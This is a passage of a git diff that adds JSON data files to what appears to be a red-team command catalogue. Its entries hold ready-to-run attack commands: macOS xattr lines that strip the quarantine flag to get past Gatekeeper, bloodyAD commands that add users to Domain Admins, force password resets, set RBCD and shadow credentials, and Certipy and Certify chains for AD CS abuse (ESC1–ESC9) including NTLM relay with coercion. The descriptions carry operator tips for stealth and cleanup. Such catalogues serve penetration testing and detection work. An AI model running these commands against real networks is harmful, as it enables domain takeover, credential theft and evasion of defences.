"xattr", + "name": "Bypass Gatekeeper via xattr", + "source": "LOOBins", + "platform": [ + "macOS" + ], + "capability": [ + "Execution", + "Defense Evasion" + ], + "nativeCategory": [ + "Execution", + "Defense Evasion" + ], + "command": "xattr -d com.apple.quarantine FILE", + "description": "Use xattr to remove quarantine extended attribute from a file.", + "mitre": [], + "fullPath": [ + "/usr/bin/xattr" + ], + "environment": [ + "Local host" + ], + "availability": "Built in", + "verification": "Upstream reference", + "compatibility": "Imported from LOOBins; availability and behaviour depend on macOS version, privacy permissions and installed components. Not lab tested here.", + "detection": [ + { + "type": "Gatekeeper Bypass via Xattr", + "value": "https://github.com/SigmaHQ/sigma/blob/master/rules/macos/process_creation/proc_creation_macos_xattr_gatekeeper_bypass.yml" + }, + { + "type": "Jamf Protect: Detect activity related to xattr and extended attributes", + "value": "https://github.com/jamf/jamfprotect/blob/main/custom_analytic_detections/xattr_extended_attributes_activity" + } + ], + "references": [ + "https://github.com/infosecB/LOOBins/blob/399e3c4bdddb55c7dc49beb20bfe43490eac1184/LOOBins/xattr.yml", + "https://megancarney.com/presentations/ExternalReport_ThreatHuntingMacOS.pdf", + "https://www.youtube.com/watch?v=_K4gnSuDkRM&feature=youtu.be" + ] + }, + { + "id": "loobins:xattr:3110f6b06aa87ef5", + "toolId": "loobins:xattr", + "toolName": "xattr", + "name": "Bypass Gatekeeper via xattr", + "source": "LOOBins", + "platform": [ + "macOS" + ], + "capability": [ + "Execution", + "Defense Evasion" + ], + "nativeCategory": [ + "Execution", + "Defense Evasion" + ], + "command": "xattr -d -r com.apple.quarantine *", + "description": "Use xattr to remove quarantine extended attribute from multiple files or directories.", + "mitre": [], + "fullPath": [ + "/usr/bin/xattr" + ], + "environment": [ + "Local host" + ], + "availability": "Built in", + "verification": "Upstream reference", + "compatibility": "Imported from LOOBins; availability and behaviour depend on macOS version, privacy permissions and installed components. Not lab tested here.", + "detection": [ + { + "type": "Gatekeeper Bypass via Xattr", + "value": "https://github.com/SigmaHQ/sigma/blob/master/rules/macos/process_creation/proc_creation_macos_xattr_gatekeeper_bypass.yml" + }, + { + "type": "Jamf Protect: Detect activity related to xattr and extended attributes", + "value": "https://github.com/jamf/jamfprotect/blob/main/custom_analytic_detections/xattr_extended_attributes_activity" + } + ], + "references": [ + "https://github.com/infosecB/LOOBins/blob/399e3c4bdddb55c7dc49beb20bfe43490eac1184/LOOBins/xattr.yml", + "https://megancarney.com/presentations/ExternalReport_ThreatHuntingMacOS.pdf", + "https://www.youtube.com/watch?v=_K4gnSuDkRM&feature=youtu.be" + ] + } + ] +} diff --git a/src/data/sources/wadcoms-additions.json b/src/data/sources/wadcoms-additions.json @@ -0,0 +1,4802 @@ +[ + { + "id": "wadcoms:adidnsdump-Enum", + "toolId": "wadcoms:adidnsdump", + "toolName": "adidnsdump", + "name": "adidnsdump-Enum", + "source": "DAEMON", + "platform": [ + "Linux", + "ActiveDirectory", + "Windows" + ], + "capability": [ + "Enumeration", + "Discovery" + ], + "nativeCategory": [ + "Enumeration", + "Discovery" + ], + "command": "# List available DNS zones\nadidnsdump -u 'test.local\\john' -p password123 --print-zones ldap://10.10.10.1\n# Dump the default zone; -r resolves nodes hidden from the unauthenticated listing (records.csv)\nadidnsdump -u 'test.local\\john' -p password123 -r ldap://10.10.10.1", + "description": "adidnsdump (dirkjanm) abuses the fact that any authenticated domain user can read the AD-integrated DNS zones (stored in the DomainDnsZones/ForestDnsZones partitions), effectively performing a zone transfer without being a DNS admin. Records whose node name is hidden from the anonymous listing are still enumerable and can be resolved by adding -r, which issues a live DNS query for each hidden node. This maps internal hostnames to IPs for target selection; results are written to records.csv. Use --print-zones first to see which zones exist.\n\nCommand Reference:\n\n\tUsername: john\n\tPassword: password123\n\tDomain: test.local\n\tTarget DC IP: 10.10.10.1", + "mitre": [ + "T1590.002" + ], + "requires": [ + "Username", + "Password" + ], + "services": [ + "DNS", + "LDAP" + ], + "references": [ + "https://github.com/dirkjanm/adidnsdump", + "https://dirkjanm.io/getting-in-the-zone-dumping-active-directory-dns-with-adidnsdump/", + "https://attack.mitre.org/techniques/T1590/002/" + ], + "added": true + }, + { + "id": "wadcoms:bloodyAD-AddComputer", + "toolId": "wadcoms:bloodyAD", + "toolName": "bloodyAD", + "name": "bloodyAD-AddComputer", + "source": "DAEMON", + "platform": [ + "Linux", + "ActiveDirectory", + "Windows" + ], + "capability": [ + "Execution", + "Privilege Escalation" + ], + "nativeCategory": [ + "Exploitation", + "PrivEsc" + ], + "command": "# Create a computer account (returns the new SAM account name and password)\nbloodyAD --host 10.10.10.1 -d test.local -u john -p 'password123' add computer EVILPC 'Password123!'", + "description": "bloodyAD's `add computer` action creates a new machine account in the domain over LDAP. Any authenticated user can create up to ms-DS-MachineAccountQuota (default 10) computer accounts, so this is a reliable way to obtain an attacker-controlled principal for RBCD, shadow-credential, or S4U abuse chains. The created computer account has a known password you control. Check the MachineAccountQuota before use; a value of 0 blocks this.\n\nCommand Reference:\n\n\tTarget DC IP: 10.10.10.1\n\n\tDomain: test.local\n\n\tUsername: john\n\n\tPassword: password123", + "mitre": [], + "requires": [ + "Username", + "Password" + ], + "services": [ + "LDAP" + ], + "references": [ + "https://github.com/CravateRouge/bloodyAD", + "https://www.thehacker.recipes/ad/movement/domain-settings/machineaccountquota", + "https://book.hacktricks.xyz/windows-hardening/active-directory-methodology" + ], + "added": true + }, + { + "id": "wadcoms:bloodyAD-AddGenericAll", + "toolId": "wadcoms:bloodyAD", + "toolName": "bloodyAD", + "name": "bloodyAD-AddGenericAll", + "source": "DAEMON", + "platform": [ + "Linux", + "ActiveDirectory", + "Windows" + ], + "capability": [ + "Privilege Escalation", + "Persistence", + "Execution" + ], + "nativeCategory": [ + "PrivEsc", + "Persistence", + "Exploitation" + ], + "command": "# Grant john GenericAll over the victim object\nbloodyAD --host 10.10.10.1 -d test.local -u john -p 'password123' add genericAll victim john", + "description": "bloodyAD's `add genericAll` action writes a new ACE granting a trustee full control (GenericAll) over a target object's DACL via LDAP. Use it to escalate a lesser right (WriteDacl / WriteOwner) into full control over a user, group, or computer, or to establish a durable ACL backdoor for persistence. Once you hold GenericAll you can reset passwords, set shadow credentials, or configure RBCD on the target.\n\nCommand Reference:\n\n\tTarget DC IP: 10.10.10.1\n\n\tDomain: test.local\n\n\tUsername: john\n\n\tPassword: password123\n\n\tTarget object: victim\n\n\tGranted principal: john", + "mitre": [], + "requires": [ + "Username", + "Password" + ], + "services": [ + "LDAP" + ], + "references": [ + "https://github.com/CravateRouge/bloodyAD", + "https://www.thehacker.recipes/ad/movement/dacl/grant-rights", + "https://book.hacktricks.xyz/windows-hardening/active-directory-methodology/acl-persistence-abuse" + ], + "added": true + }, + { + "id": "wadcoms:bloodyAD-AddGroupMember", + "toolId": "wadcoms:bloodyAD", + "toolName": "bloodyAD", + "name": "bloodyAD-AddGroupMember", + "source": "DAEMON", + "platform": [ + "Linux", + "ActiveDirectory", + "Windows" + ], + "capability": [ + "Privilege Escalation", + "Execution" + ], + "nativeCategory": [ + "PrivEsc", + "Exploitation" + ], + "command": "# Add yourself (john) to a group you can write to\nbloodyAD --host 10.10.10.1 -d test.local -u john -p 'password123' add groupMember 'Domain Admins' john", + "description": "bloodyAD's `add groupMember` action writes the `member` attribute of a group over LDAP, adding an arbitrary principal (typically yourself) to it. Use it when BloodHound shows you hold GenericAll, GenericWrite, WriteOwner, or Self/AddMember over a privileged group such as an admin or Remote Management group. Adding your account to a high-value group is a direct privilege-escalation primitive; remove yourself afterward to reduce footprint.\n\nCommand Reference:\n\n\tTarget DC IP: 10.10.10.1\n\n\tDomain: test.local\n\n\tUsername: john\n\n\tPassword: password123\n\n\tTarget group: Domain Admins", + "mitre": [], + "requires": [ + "Username", + "Password" + ], + "services": [ + "LDAP" + ], + "references": [ + "https://github.com/CravateRouge/bloodyAD", + "https://www.thehacker.recipes/ad/movement/dacl/addmember", + "https://book.hacktricks.xyz/windows-hardening/active-directory-methodology/acl-persistence-abuse" + ], + "added": true + }, + { + "id": "wadcoms:bloodyAD-AddRBCD", + "toolId": "wadcoms:bloodyAD", + "toolName": "bloodyAD", + "name": "bloodyAD-AddRBCD", + "source": "DAEMON", + "platform": [ + "Linux", + "ActiveDirectory", + "Windows" + ], + "capability": [ + "Privilege Escalation", + "Lateral Movement", + "Execution" + ], + "nativeCategory": [ + "PrivEsc", + "Lateral Movement", + "Exploitation" + ], + "command": "# Allow EVILPC$ to act on behalf of others against DC01$\nbloodyAD --host 10.10.10.1 -d test.local -u john -p 'password123' add rbcd 'DC01$' 'EVILPC$'", + "description": "bloodyAD's `add rbcd` action writes the `msDS-AllowedToActOnBehalfOfOtherIdentity` attribute of a target computer over LDAP, configuring Resource-Based Constrained Delegation so that a controlled service account may impersonate any user to that machine. Combine with an attacker-controlled computer account (see bloodyAD add computer) and Impacket getST -impersonate to obtain a service ticket as a local admin. Requires GenericWrite / GenericAll / WriteProperty over the target computer object.\n\nCommand Reference:\n\n\tTarget DC IP: 10.10.10.1\n\n\tDomain: test.local\n\n\tUsername: john\n\n\tPassword: password123\n\n\tTarget computer: DC01$\n\n\tControlled service: EVILPC$", + "mitre": [], + "requires": [ + "Username", + "Password" + ], + "services": [ + "LDAP" + ], + "references": [ + "https://github.com/CravateRouge/bloodyAD", + "https://www.thehacker.recipes/ad/movement/kerberos/delegations/rbcd", + "https://book.hacktricks.xyz/windows-hardening/active-directory-methodology/resource-based-constrained-delegation" + ], + "added": true + }, + { + "id": "wadcoms:bloodyAD-DontReqPreauth", + "toolId": "wadcoms:bloodyAD", + "toolName": "bloodyAD", + "name": "bloodyAD-DontReqPreauth", + "source": "DAEMON", + "platform": [ + "Linux", + "ActiveDirectory", + "Windows" + ], + "capability": [ + "Credential Access", + "Execution" + ], + "nativeCategory": [ + "Credential Access", + "Exploitation" + ], + "command": "# Enable targeted AS-REP roasting on the victim\nbloodyAD --host 10.10.10.1 -d test.local -u john -p 'password123' add uac victim -f DONT_REQ_PREAUTH", + "description": "bloodyAD's `add uac` action with the `-f DONT_REQ_PREAUTH` flag sets the DONT_REQ_PREAUTH bit in a target user's userAccountControl over LDAP, disabling Kerberos pre-authentication. This is a targeted AS-REP roasting primitive: once the flag is set you can request an AS-REP for the account and crack it offline. Requires GenericWrite / write access to the target's userAccountControl; remove the flag afterward to clean up.\n\nCommand Reference:\n\n\tTarget DC IP: 10.10.10.1\n\n\tDomain: test.local\n\n\tUsername: john\n\n\tPassword: password123\n\n\tVictim user: victim", + "mitre": [], + "requires": [ + "Username", + "Password" + ], + "services": [ + "LDAP", + "Kerberos" + ], + "references": [ + "https://github.com/CravateRouge/bloodyAD", + "https://www.thehacker.recipes/ad/movement/kerberos/asreproast", + "https://book.hacktricks.xyz/windows-hardening/active-directory-methodology/asreproast" + ], + "added": true + }, + { + "id": "wadcoms:bloodyAD-SetOwner", + "toolId": "wadcoms:bloodyAD", + "toolName": "bloodyAD", + "name": "bloodyAD-SetOwner", + "source": "DAEMON", + "platform": [ + "Linux", + "ActiveDirectory", + "Windows" + ], + "capability": [ + "Privilege Escalation", + "Execution", + "Persistence" + ], + "nativeCategory": [ + "PrivEsc", + "Exploitation", + "Persistence" + ], + "command": "# Take ownership of the victim object, then grant yourself full control\nbloodyAD --host 10.10.10.1 -d test.local -u john -p 'password123' set owner victim john\nbloodyAD --host 10.10.10.1 -d test.local -u john -p 'password123' add genericAll victim john", + "description": "bloodyAD's `set owner` action rewrites the owner field in a target object's security descriptor over LDAP. The object owner has implicit WriteDacl, so seizing ownership of a user, group, or computer lets you subsequently grant yourself GenericAll (see bloodyAD add genericAll) and fully control it. Use it when BloodHound reports WriteOwner over a principal. Pair it with a follow-up DACL write to complete the takeover.\n\nCommand Reference:\n\n\tTarget DC IP: 10.10.10.1\n\n\tDomain: test.local\n\n\tUsername: john\n\n\tPassword: password123\n\n\tTarget object: victim\n\n\tNew owner: john", + "mitre": [], + "requires": [ + "Username", + "Password" + ], + "services": [ + "LDAP" + ], + "references": [ + "https://github.com/CravateRouge/bloodyAD", + "https://www.thehacker.recipes/ad/movement/dacl/grant-ownership", + "https://book.hacktricks.xyz/windows-hardening/active-directory-methodology/acl-persistence-abuse" + ], + "added": true + }, + { + "id": "wadcoms:bloodyAD-SetPassword", + "toolId": "wadcoms:bloodyAD", + "toolName": "bloodyAD", + "name": "bloodyAD-SetPassword", + "source": "DAEMON", + "platform": [ + "Linux", + "ActiveDirectory", + "Windows" + ], + "capability": [ + "Execution", + "Privilege Escalation" + ], + "nativeCategory": [ + "Exploitation", + "PrivEsc" + ], + "command": "# Force-reset the password of a user you have write rights over\nbloodyAD --host 10.10.10.1 -d test.local -u john -p 'password123' set password victim 'NewPassword123!'", + "description": "bloodyAD's `set password` action performs a targeted password reset on a user or computer object over LDAP(S). It is the exploitation step when you hold GenericAll, User-Force-Change-Password, or WriteAll over a victim principal discovered in BloodHound. Resetting a service account or privileged user password grants immediate takeover, at the cost of locking out the legitimate user, so it is loud. Requires LDAPS (or LDAP with channel binding) on modern DCs for the password write.\n\nCommand Reference:\n\n\tTarget DC IP: 10.10.10.1\n\n\tDomain: test.local\n\n\tUsername: john\n\n\tPassword: password123\n\n\tVictim user: victim", + "mitre": [], + "requires": [ + "Username", + "Password" + ], + "services": [ + "LDAP" + ], + "references": [ + "https://github.com/CravateRouge/bloodyAD", + "https://www.thehacker.recipes/ad/movement/dacl/forcechangepassword", + "https://book.hacktricks.xyz/windows-hardening/active-directory-methodology/acl-persistence-abuse" + ], + "added": true + }, + { + "id": "wadcoms:bloodyAD-ShadowCredentials", + "toolId": "wadcoms:bloodyAD", + "toolName": "bloodyAD", + "name": "bloodyAD-ShadowCredentials", + "source": "DAEMON", + "platform": [ + "Linux", + "ActiveDirectory", + "Windows" + ], + "capability": [ + "Privilege Escalation", + "Persistence", + "Credential Access" + ], + "nativeCategory": [ + "PrivEsc", + "Persistence", + "Credential Access" + ], + "command": "# Add a shadow credential (KeyCredentialLink) to the victim\nbloodyAD --host 10.10.10.1 -d test.local -u john -p 'password123' add shadowCredentials 'DC01$'", + "description": "bloodyAD's `add shadowCredentials` action appends an attacker-generated key credential to the target's `msDS-KeyCredentialLink` attribute (the Shadow Credentials / Key Trust technique). Requiring only GenericWrite over the victim and an ADCS-enabled PKINIT-capable environment, it lets you authenticate as the target via a certificate and recover its NT hash without changing the account's password, making it far stealthier than a password reset. bloodyAD prints the PFX and follow-up PKINIT command.\n\nCommand Reference:\n\n\tTarget DC IP: 10.10.10.1\n\n\tDomain: test.local\n\n\tUsername: john\n\n\tPassword: password123\n\n\tVictim account: DC01$", + "mitre": [], + "requires": [ + "Username", + "Password" + ], + "services": [ + "LDAP", + "ADCS" + ], + "references": [ + "https://github.com/CravateRouge/bloodyAD", + "https://www.thehacker.recipes/ad/movement/kerberos/shadow-credentials", + "https://posts.specterops.io/shadow-credentials-abusing-key-trust-account-mapping-for-takeover-8ee1a53566ab" + ], + "added": true + }, + { + "id": "wadcoms:Certify-ESC1", + "toolId": "wadcoms:Certify", + "toolName": "Certify", + "name": "Certify-ESC1", + "source": "DAEMON", + "platform": [ + "Windows", + "ActiveDirectory" + ], + "capability": [ + "Privilege Escalation", + "Execution" + ], + "nativeCategory": [ + "PrivEsc", + "Exploitation" + ], + "command": "Certify.exe request /ca:dc.test.local\\test-CA /template:ESC1 /altname:administrator", + "description": "Certify is the Windows/.NET GhostPack tool for enumerating and abusing AD CS from an existing foothold. Its request verb enrolls in a vulnerable template and, for ESC1, uses /altname to set an arbitrary Subject Alternative Name (e.g. Administrator) on the issued certificate. The output PEM is converted to .pfx with openssl and then passed to Rubeus asktgt /certificate for PKINIT. Use this when you already have a Windows beacon and want to stay on-host rather than pivoting to a Linux attacker box with Certipy.\n\nCommand Reference:\n\n\tCA config: dc.test.local\\test-CA\n\n\tTemplate: ESC1\n\n\tImpersonated user: Administrator", + "mitre": [], + "requires": [ + "Shell" + ], + "services": [ + "ADCS" + ], + "references": [ + "https://github.com/GhostPack/Certify", + "https://posts.specterops.io/certified-pre-owned-d95910965cd2", + "https://book.hacktricks.xyz/windows-hardening/active-directory-methodology/ad-certificates/domain-escalation" + ], + "added": true + }, + { + "id": "wadcoms:Certipy-Account-Create", + "toolId": "wadcoms:Certipy", + "toolName": "Certipy", + "name": "Certipy-Account-Create", + "source": "DAEMON", + "platform": [ + "Linux", + "ActiveDirectory", + "Windows" + ], + "capability": [ + "Execution" + ], + "nativeCategory": [ + "Exploitation" + ], + "command": "certipy account create -u john@test.local -p password123 -dc-ip 10.10.10.1 -user 'WEBSRV01$' -pass 'ComputerPass123!' -dns websrv01.test.local", + "description": "Certipy account create adds a new computer (or user) object over LDAP when the operator has MachineAccountQuota available or delegated create rights. This is useful for staging RBCD, Shadow Credentials, or ESC-chain victim accounts that the operator fully controls. The subcommand also supports read/update/delete to modify existing objects' attributes (UPN, SPN, DNS hostname). Runs over LDAP, so add -k / -dc-host for Kerberos-only environments.\n\nCommand Reference:\n\n\tDomain: test.local\n\n\tUsername: john\n\n\tPassword: password123\n\n\tNew account: WEBSRV01$\n\n\tDomain Controller IP: 10.10.10.1", + "mitre": [], + "requires": [ + "Username", + "Password" + ], + "services": [ + "LDAP" + ], + "references": [ + "https://github.com/ly4k/Certipy", + "https://research.ifcr.dk/certipy-4-0-esc9-esc10-bloodhound-and-some-thoughts-on-mitigations-c9d38edc7723", + "https://www.thehacker.recipes/ad/movement/adcs" + ], + "added": true + }, + { + "id": "wadcoms:Certipy-Auth-PKINIT", + "toolId": "wadcoms:Certipy", + "toolName": "Certipy", + "name": "Certipy-Auth-PKINIT", + "source": "DAEMON", + "platform": [ + "Linux", + "ActiveDirectory", + "Windows" + ], + "capability": [ + "Credential Access" + ], + "nativeCategory": [ + "Credential Access" + ], + "command": "certipy auth -pfx administrator.pfx -username administrator -domain test.local -dc-ip 10.10.10.1", + "description": "Certipy auth consumes a certificate/private key pair (.pfx) and performs Kerberos PKINIT pre-authentication to request a TGT for the identity in the certificate. It then uses the U2U/UnPAC-the-hash technique to recover the account's NT hash from the PAC, saving a .ccache and printing the hash. This is the final step of most ADCS escalation chains (ESC1/ESC3/ESC6/shadow creds): turn the issued certificate into a usable TGT and an NT hash for pass-the-hash.\n\nCommand Reference:\n\n\tDomain: test.local\n\n\tPFX file: administrator.pfx\n\n\tDomain Controller IP: 10.10.10.1", + "mitre": [], + "requires": [ + "PFX" + ], + "services": [ + "Kerberos", + "ADCS" + ], + "references": [ + "https://github.com/ly4k/Certipy", + "https://posts.specterops.io/certified-pre-owned-d95910965cd2", + "https://www.thehacker.recipes/ad/movement/kerberos/pkinit" + ], + "added": true + }, + { + "id": "wadcoms:Certipy-ESC1", + "toolId": "wadcoms:Certipy", + "toolName": "Certipy", + "name": "Certipy-ESC1", + "source": "DAEMON", + "platform": [ + "Linux", + "ActiveDirectory", + "Windows" + ], + "capability": [ + "Privilege Escalation", + "Execution" + ], + "nativeCategory": [ + "PrivEsc", + "Exploitation" + ], + "command": "certipy req -u john@test.local -p password123 -dc-ip 10.10.10.1 -target dc.test.local -ca 'test-CA' -template 'ESC1' -upn administrator@test.local -sid S-1-5-21-1339291983-1349129144-367733775-500", + "description": "ESC1 abuses a certificate template that allows an enrollee to supply an arbitrary Subject Alternative Name (ENROLLEE_SUPPLIES_SUBJECT) and enables Client Authentication EKU, while granting enrollment rights to low-privileged users. Certipy req enrolls against the vulnerable template and sets -upn to Administrator, producing a .pfx that authenticates as the domain admin. Supply -sid with the target's objectSid so the request also survives the 2022 strong certificate mapping (KB5014754) enforcement. Follow up with certipy auth to obtain a TGT and NT hash.\n\nCommand Reference:\n\n\tDomain: test.local\n\n\tUsername: john\n\n\tPassword: password123\n\n\tCA host (FQDN): dc.test.local\n\n\tDomain SID: S-1-5-21-1339291983-1349129144-367733775", + "mitre": [], + "requires": [ + "Username", + "Password" + ], + "services": [ + "ADCS" + ], + "references": [ + "https://github.com/ly4k/Certipy", + "https://posts.specterops.io/certified-pre-owned-d95910965cd2", + "https://book.hacktricks.xyz/windows-hardening/active-directory-methodology/ad-certificates/domain-escalation" + ], + "added": true + }, + { + "id": "wadcoms:Certipy-ESC3", + "toolId": "wadcoms:Certipy", + "toolName": "Certipy", + "name": "Certipy-ESC3", + "source": "DAEMON", + "platform": [ + "Linux", + "ActiveDirectory", + "Windows" + ], + "capability": [ + "Privilege Escalation", + "Execution" + ], + "nativeCategory": [ + "PrivEsc", + "Exploitation" + ], + "command": "# 1) Obtain an enrollment agent certificate\ncertipy req -u john@test.local -p password123 -dc-ip 10.10.10.1 -target dc.test.local -ca 'test-CA' -template 'EnrollmentAgent'\n\n# 2) Request a cert on behalf of the Administrator using the agent pfx\ncertipy req -u john@test.local -p password123 -dc-ip 10.10.10.1 -target dc.test.local -ca 'test-CA' -template 'User' -pfx john.pfx -on-behalf-of 'TEST\\Administrator'", + "description": "ESC3 abuses a template that grants the Certificate Request Agent (Enrollment Agent) EKU. Certipy first enrolls in the enrollment-agent template to obtain an agent .pfx, then makes a second request against a normal client-auth template (e.g. User) with -on-behalf-of set to a privileged account and -pfx pointing at the agent certificate. The resulting certificate authenticates as the impersonated user. Requires enrollment rights on both the agent template and the target template.\n\nCommand Reference:\n\n\tDomain: test.local\n\n\tUsername: john\n\n\tPassword: password123\n\n\tCA host (FQDN): dc.test.local", + "mitre": [], + "requires": [ + "Username", + "Password" + ], + "services": [ + "ADCS" + ], + "references": [ + "https://github.com/ly4k/Certipy", + "https://posts.specterops.io/certified-pre-owned-d95910965cd2", + "https://book.hacktricks.xyz/windows-hardening/active-directory-methodology/ad-certificates/domain-escalation" + ], + "added": true + }, + { + "id": "wadcoms:Certipy-ESC4", + "toolId": "wadcoms:Certipy", + "toolName": "Certipy", + "name": "Certipy-ESC4", + "source": "DAEMON", + "platform": [ + "Linux", + "ActiveDirectory", + "Windows" + ], + "capability": [ + "Privilege Escalation", + "Execution" + ], + "nativeCategory": [ + "PrivEsc", + "Exploitation" + ], + "command": "# Back up the template config, then overwrite it with a default vulnerable (ESC1-like) configuration\ncertipy template -u john@test.local -p password123 -dc-ip 10.10.10.1 -template 'ESC4' -save-old\n\n# Now abuse it exactly like ESC1 (see Certipy-ESC1), then restore the original config afterwards:\n# certipy template -u john@test.local -p password123 -dc-ip 10.10.10.1 -template 'ESC4' -configuration ESC4.json", + "description": "ESC4 is a certificate template ACL misconfiguration: the operator has Write/WriteDacl/WriteOwner over a template object. Certipy template with -write-default-configuration overwrites the template's settings with a known ESC1-vulnerable configuration (enrollee-supplied SAN, client-auth EKU, low-priv enrollment), turning any template into an ESC1 path. Use -save-old first to snapshot the original config, exploit ESC1, then restore with -write-configuration <file>.json to reduce footprint. OPSEC: the template change is domain-wide and logged in the config partition.\n\nCommand Reference:\n\n\tDomain: test.local\n\n\tUsername: john\n\n\tPassword: password123\n\n\tDomain Controller IP: 10.10.10.1", + "mitre": [], + "requires": [ + "Username", + "Password" + ], + "services": [ + "ADCS", + "LDAP" + ], + "references": [ + "https://github.com/ly4k/Certipy", + "https://www.thehacker.recipes/ad/movement/adcs/access-controls", + "https://book.hacktricks.xyz/windows-hardening/active-directory-methodology/ad-certificates/domain-escalation" + ], + "added": true + }, + { + "id": "wadcoms:Certipy-ESC6", + "toolId": "wadcoms:Certipy", + "toolName": "Certipy", + "name": "Certipy-ESC6", + "source": "DAEMON", + "platform": [ + "Linux", + "ActiveDirectory", + "Windows" + ], + "capability": [ + "Privilege Escalation", + "Execution" + ], + "nativeCategory": [ + "PrivEsc", + "Exploitation" + ], + "command": "certipy req -u john@test.local -p password123 -dc-ip 10.10.10.1 -target dc.test.local -ca 'test-CA' -template 'User' -upn administrator@test.local -sid S-1-5-21-1339291983-1349129144-367733775-500", + "description": "ESC6 occurs when the Enterprise CA has the EDITF_ATTRIBUTESUBJECTALTNAME2 flag set, which lets any requester embed an arbitrary SAN into a certificate regardless of the template's subject settings. Certipy req can therefore enroll in a standard client-auth template (e.g. User) while supplying -upn Administrator to impersonate a privileged account. Include -sid to satisfy strong certificate mapping. Note that post-May-2022 patched DCs ignore the SAN unless the mapping is present, so ESC6 alone is often mitigated on updated environments.\n\nCommand Reference:\n\n\tDomain: test.local\n\n\tUsername: john\n\n\tPassword: password123\n\n\tCA host (FQDN): dc.test.local\n\n\tDomain SID: S-1-5-21-1339291983-1349129144-367733775", + "mitre": [], + "requires": [ + "Username", + "Password" + ], + "services": [ + "ADCS" + ], + "references": [ + "https://github.com/ly4k/Certipy", + "https://posts.specterops.io/certified-pre-owned-d95910965cd2", + "https://book.hacktricks.xyz/windows-hardening/active-directory-methodology/ad-certificates/domain-escalation" + ], + "added": true + }, + { + "id": "wadcoms:Certipy-ESC7-ManageCA", + "toolId": "wadcoms:Certipy", + "toolName": "Certipy", + "name": "Certipy-ESC7-ManageCA", + "source": "DAEMON", + "platform": [ + "Linux", + "ActiveDirectory", + "Windows" + ], + "capability": [ + "Privilege Escalation", + "Execution" + ], + "nativeCategory": [ + "PrivEsc", + "Exploitation" + ], + "command": "# Grant our user the officer right on the CA\ncertipy ca -u john@test.local -p password123 -dc-ip 10.10.10.1 -target dc.test.local -ca 'test-CA' -add-officer john\n\n# Enable the SubCA template so we can request against it\ncertipy ca -u john@test.local -p password123 -dc-ip 10.10.10.1 -target dc.test.local -ca 'test-CA' -enable-template 'SubCA'\n\n# Request (goes pending), then issue and retrieve as an officer\ncertipy req -u john@test.local -p password123 -dc-ip 10.10.10.1 -target dc.test.local -ca 'test-CA' -template 'SubCA' -upn administrator@test.local\ncertipy ca -u john@test.local -p password123 -dc-ip 10.10.10.1 -target dc.test.local -ca 'test-CA' -issue-request 785\ncertipy req -u john@test.local -p password123 -dc-ip 10.10.10.1 -target dc.test.local -ca 'test-CA' -retrieve 785", + "description": "ESC7 is when a principal holds the ManageCA (or ManageCertificates) right on the Enterprise CA. Certipy ca -add-officer promotes the controlled user to a certificate officer, which lets it approve pending requests. Combined with enabling the built-in SubCA template (-enable-template SubCA), the operator can request a cert that goes pending, then issue it (-issue-request) and retrieve it (-retrieve) as any UPN. This turns CA administrative rights into domain-admin certificate issuance.\n\nCommand Reference:\n\n\tDomain: test.local\n\n\tUsername: john\n\n\tPassword: password123\n\n\tCA host (FQDN): dc.test.local", + "mitre": [], + "requires": [ + "Username", + "Password" + ], + "services": [ + "ADCS", + "RPC" + ], + "references": [ + "https://github.com/ly4k/Certipy", + "https://www.thehacker.recipes/ad/movement/adcs/access-controls", + "https://book.hacktricks.xyz/windows-hardening/active-directory-methodology/ad-certificates/domain-escalation" + ], + "added": true + }, + { + "id": "wadcoms:Certipy-ESC8-Relay", + "toolId": "wadcoms:Certipy", + "toolName": "Certipy", + "name": "Certipy-ESC8-Relay", + "source": "DAEMON", + "platform": [ + "Linux", + "ActiveDirectory", + "Windows" + ], + "capability": [ + "Privilege Escalation", + "Credential Access", + "Execution" + ], + "nativeCategory": [ + "PrivEsc", + "Credential Access", + "Exploitation" + ], + "command": "# Start the ADCS HTTP relay targeting the CA web enrollment endpoint\ncertipy relay -target 'http://10.10.10.1' -template 'DomainController'\n\n# In another shell, coerce the DC to authenticate to the listener (10.10.10.2), e.g.\n# coercer coerce -u john -p password123 -d test.local -t 10.10.10.1 -l 10.10.10.2", + "description": "ESC8 abuses the AD CS web enrollment interface (certsrv / certfnsh.asp), which accepts NTLM authentication and is not protected by channel binding or EPA by default. Certipy relay stands up an HTTP-to-ADCS relay server; once a privileged machine account (e.g. a domain controller) is coerced into authenticating (PetitPotam/Coercer), the relay requests a certificate from the DomainController template on its behalf. The resulting .pfx authenticates as the coerced machine. Certipy relay is the modern replacement for ntlmrelayx.py -t http://<ca>/certsrv/certfnsh.asp --adcs.\n\nCommand Reference:\n\n\tCA / web enrollment host IP: 10.10.10.1\n\n\tAttacker/Listener IP: 10.10.10.2", + "mitre": [], + "requires": [ + "No_Creds" + ], + "services": [ + "ADCS", + "NTLM" + ], + "references": [ + "https://github.com/ly4k/Certipy", + "https://posts.specterops.io/certified-pre-owned-d95910965cd2", + "https://book.hacktricks.xyz/windows-hardening/active-directory-methodology/ad-certificates/domain-escalation" + ], + "added": true + }, + { + "id": "wadcoms:Certipy-ESC9-NoSecurityExtension", + "toolId": "wadcoms:Certipy", + "toolName": "Certipy", + "name": "Certipy-ESC9-NoSecurityExtension", + "source": "DAEMON", + "platform": [ + "Linux", + "ActiveDirectory", + "Windows" + ], + "capability": [ + "Privilege Escalation", + "Execution" + ], + "nativeCategory": [ + "PrivEsc", + "Exploitation" + ], + "command": "# Point the controlled victim's UPN at the target admin (no @domain, so it maps by name)\ncertipy account update -u john@test.local -p password123 -dc-ip 10.10.10.1 -user victim -upn administrator\n\n# Enroll/authenticate as victim (now mapping to administrator), then restore:\n# certipy account update -u john@test.local -p password123 -dc-ip 10.10.10.1 -user victim -upn victim@test.local", + "description": "ESC9/ESC10 abuse weak certificate mapping. When a template has CT_FLAG_NO_SECURITY_EXTENSION (ESC9) or the DC uses weak UPN/SPN mapping (ESC10), an attacker with write access over a victim account can change its userPrincipalName to a target admin's value, enroll a certificate as the victim, then authenticate as the admin because the cert has no SID binding. Certipy account update rewrites the victim's -upn over LDAP; revert it afterwards. This chains with certipy shadow (to enroll as the victim) and certipy auth.\n\nCommand Reference:\n\n\tDomain: test.local\n\n\tUsername: john\n\n\tPassword: password123\n\n\tVictim account: victim\n\n\tDomain Controller IP: 10.10.10.1", + "mitre": [], + "requires": [ + "Username", + "Password" + ], + "services": [ + "LDAP", + "ADCS" + ], + "references": [ + "https://github.com/ly4k/Certipy", + "https://research.ifcr.dk/certipy-4-0-esc9-esc10-bloodhound-and-some-thoughts-on-mitigations-c9d38edc7723", + 